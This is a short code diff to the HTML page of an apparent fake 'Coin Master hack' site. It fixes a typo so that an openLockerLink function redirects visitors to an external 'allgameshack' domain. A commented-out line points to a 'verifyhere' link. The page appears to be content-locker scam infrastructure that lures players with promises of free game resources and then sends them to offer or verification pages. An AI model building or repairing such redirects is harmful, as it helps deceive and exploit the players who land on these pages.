--- a/15coinmaster/index.html
+++ b/15coinmaster/index.html
@@ -997,7 +997,7 @@
       function openLockerLink() {
         // window.location = "https://youtube.com/";
         // window.location.href = "https://verifyhere.xyz/cl/i/6dxw9m";
-        windoe.location.href="https://allgameshackintermediate.onrender.com";
+        window.location.href="https://allgameshackintermediate.onrender.com";
       }
     </script>
   </body>
